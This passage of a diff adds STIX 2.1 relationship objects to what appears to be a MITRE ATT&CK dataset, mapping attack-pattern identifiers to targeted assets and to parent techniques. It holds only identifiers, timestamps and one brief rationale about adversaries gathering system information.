"x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b62e3314-b9f8-4d87-b24a-2fe50bc62e3f", + "created": "2024-05-22T17:26:18.098Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:05:13.313Z", + "description": "Asset Mapping Rationale: An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may also leverage a Network Device CLI on network devices to gather detailed system information.", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6309476-8268-4c47-920b-8a556cd8ae4c", + "created": "2023-09-29T18:47:07.359Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:47:07.359Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b637fe96-f160-4dcc-814f-615e52fbde93", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b654f40c-9d3d-4e67-8218-772e4024885d", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b663ddd4-b9d1-4337-800f-8dac20433dde", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b66b8ac9-3579-495f-8be0-45203f8a8873", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6765164-14b8-4804-aa68-0d88d48c1582", + "created": "2024-03-28T03:29:36.246Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-28T03:29:36.246Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869", + "target_ref": "attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b67e9c85-26e9-4600-a3cc-34e808c110eb", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b69905bd-6865-4092-9543-47bd9ae318ec", + "created": "2023-09-28T19:54:22.618Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:54:22.618Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b69a3f1b-fe0e-40b4-9280-3c622af2c541", + "created": "2024-06-27T09:46:02.541Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:46:02.541Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6a3348c-99db-49d0-b98e-9bc80b4cef06", + "created": "2020-02-05T19:34:05.080Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6b1bf2f-f795-4c4e-a2e9-9527695c10cb", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6ba4fa6-4b31-4824-9885-882274c62716", + "created": "2020-10-12T13:52:32.923Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6c09dbf-0934-42c5-a517-847128a0ce5a", + "created": "2020-10-01T01:08:41.201Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b6df8cc2-b8c8-4095-a1bc-87c87572ff37", + "created": "2024-06-27T08:57:59.468Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:57:59.468Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b70535bf-c4a8-421c-9e47-b73bf8d4c074", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7064aad-995c-450f-b43d-f4bd2362d401", + "created": "2020-02-05T20:09:23.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", + "target_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b71487a3-f75c-4c2f-9586-ff56cae9a9be", + "created": "2024-06-26T19:30:03.604Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:30:03.604Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7193112-73b8-4a09-a3cf-109a841fab30", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7284360-0d80-45bb-8486-263ae8f8fa63", + "created": "2023-09-28T21:26:01.106Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:26:01.106Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7344dfb-621b-4558-ab22-6c1f256ee746", + "created": "2023-09-29T16:46:27.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:46:27.408Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7370603-8f46-49d8-a44a-35c517bcd919", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b73889d3-938b-44f9-b364-34da86e34ad1", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7677459-06cc-4e9e-88f5-faf7cdae084a", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b774fcb4-43bf-4ff1-98c6-0a94838eacc2", + "created": "2023-09-29T18:57:10.064Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-28T03:07:43.715Z", + "description": "Asset Mapping Rationale: ", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b78ed1d8-cea4-4f1a-8f52-51330fd57816", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b799177a-53d6-44ee-90da-e199e48969ef", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7a70c9f-9e05-424d-99a6-794a50b1b05d", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7a9bff5-2e15-4d3d-ac88-84af1239a586", + "created": "2023-09-28T19:51:42.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:51:42.728Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7ba305a-c99e-4c69-a117-6cc80b8f9ddc", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7bbd914-d10f-4955-9a51-35b5042f9bb8", + "created": "2024-06-27T09:24:25.952Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:24:25.952Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7d7d703-d032-4799-8cbe-a507ff5d4f07", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7dc0db4-b1fb-4235-8b49-0792e7019377", + "created": "2020-03-09T13:48:55.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b7f99597-3cbb-4cc4-a0d5-1d2abd84dbea", + "created": "2020-10-01T01:20:53.171Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b", + "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8260fdd-40da-4b8f-8775-8aef75187e02", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b839e118-c5eb-4186-bd43-918b78ffaa4e", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b8437a71-7c78-4935-bbbf-b9990e4b608a", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--b849b1ae-0b73-484c-9061-38ddf3cbdbb3", + "created": "2020-03-15T16:21:45.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "target_ref": 